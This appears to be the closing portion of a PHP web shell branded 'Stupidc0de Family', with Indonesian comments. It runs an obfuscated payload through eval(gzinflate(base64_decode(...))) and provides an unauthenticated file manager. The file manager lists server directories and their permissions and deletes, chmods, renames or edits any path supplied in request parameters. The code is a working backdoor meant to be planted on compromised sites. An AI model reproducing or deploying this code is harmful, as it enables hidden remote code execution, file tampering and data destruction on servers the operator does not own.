1919. elseif(isset($_GET['x']) && ($_GET['x'] == 'zonesH')){ echo "<br/><br/>";@eval(gzinflate(base64_decode($zoneH))); "</div>"; }
1920. /////////////
1921.  
1922. /*
1923. File Manager
1924. Dimulai Dari Sini
1925. */
1926. else{
1927. echo '</table><br />';
1928. ////////////////////////////////////////////////////////////////////////
1929. /////////////////////////////////////////////////////////////////////////
1930. echo "<center>";
1931. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
1932. if($_POST['type'] == 'dir'){
1933. if(rmdir($_POST['path'])){
1934. echo '<script>alert("Delete Dir Sukses!");</script>';
1935. }else{
1936. echo '<script>alert("Delete Dir Gagal!");</script>';
1937. }
1938. }elseif($_POST['type'] == 'file'){
1939. if(unlink($_POST['path'])){
1940. echo '<script>alert("Delete File Sukses!");</script>';
1941. }else{
1942. echo '<script>alert("Delete File Gagal!");</script>';
1943. }
1944. }
1945. }
1946. echo '</center>';
1947. $scandir = scandir($path);
1948. echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
1949. ';
1950.  
1951. foreach($scandir as $dir){
1952. if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
1953. echo "<tr>
1954. <td><a style='color:white; font-family:Homenaje;' href=\"?path=$path/$dir\">$dir</a></td>
1955. <td><center style='color:orange; font-family:Homenaje;'>--</center></td>
1956. <td><center>";
1957. if(is_writable("$path/$dir")) echo "<font style='color:springgreen; font-family:Homenaje;'>";
1958. elseif(!is_readable("$path/$dir")) echo "<font style='color:red; font-family:Homenaje;'>";
1959. echo perms("$path/$dir");
1960. if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
1961.  
1962. echo "</center></td>
1963. <td width='26%'><center><form method=\"POST\" action=\"?option&path=$path\">
1964. <select class='bordergaya' name=\"opt\">
1965. <option value=\"\"></option>
1966. <option value=\"delete\">Delete</option>
1967. <option value=\"chmod\">Chmod</option>
1968. <option value=\"rename\">Rename</option>
1969. </select>
1970. <input type=\"hidden\" name=\"type\" value=\"dir\">
1971. <input type=\"hidden\" name=\"name\" value=\"$dir\">
1972. <input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
1973. <input class='bordergaya' type=\"submit\" value=\"Execute\" />
1974. </form></center></td>
1975. </tr>";
1976. }
1977. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
1978. foreach($scandir as $file){
1979. if(!is_file("$path/$file")) continue;
1980. $size = filesize("$path/$file")/1024;
1981. $size = round($size,3);
1982. if($size >= 1024){
1983. $size = round($size/1024,2).' MB';
1984. }else{
1985. $size = $size.' KB';
1986. }
1987.  
1988. echo "<tr>
1989. <td><a style='color:white; font-family:Homenaje;' href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
1990. <td><center style='color:orange; font-family:Homenaje;'>".$size."</center></td>
1991. <td><center>";
1992. if(is_writable("$path/$file")) echo "<font style='color:springgreen; font-family:Homenaje;'>";
1993. elseif(!is_readable("$path/$file")) echo "<font style='color:red; font-family:Homenaje;'>";
1994. echo perms("$path/$file");
1995. if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
1996. echo "</center></td>
1997. <td width='26%'><center><form method=\"POST\" action=\"?option&path=$path\">
1998. <select class='bordergaya' name=\"opt\">
1999. <option value=\"\"></option>
2000. <option value=\"delete\">Delete</option>
2001. <option value=\"chmod\">Chmod</option>
2002. <option value=\"rename\">Rename</option>
2003. <option value=\"edit\">Edit</option>
2004. </select>
2005. <input type=\"hidden\" name=\"type\" value=\"file\">
2006. <input type=\"hidden\" name=\"name\" value=\"$file\">
2007. <input type=\"hidden\" name=\"path\" value=\"$path/$file\">
2008. <input class='bordergaya' type=\"submit\" value=\"Execute\" />
2009. </form></center></td>
2010. </tr>";
2011. }
2012. echo '</table>
2013. </div>';
2014. }
2015. ///////////////////////////////////////////////////////////////////////
2016. ////////////////////////////////////////////////////////////////////////
2017.  
2018.  
2019.  
2020. ?>
2021. <br/><br/>
2022. <script language="JavaScript"> Year=new Date(); var copyright=Year.getUTCFullYear(); document.write("<font face='Fredericka the Great' size='3px' color='grey'>&copy; Stupidc0de Family " + copyright +"</font> "); </script>
2023. </BODY></html>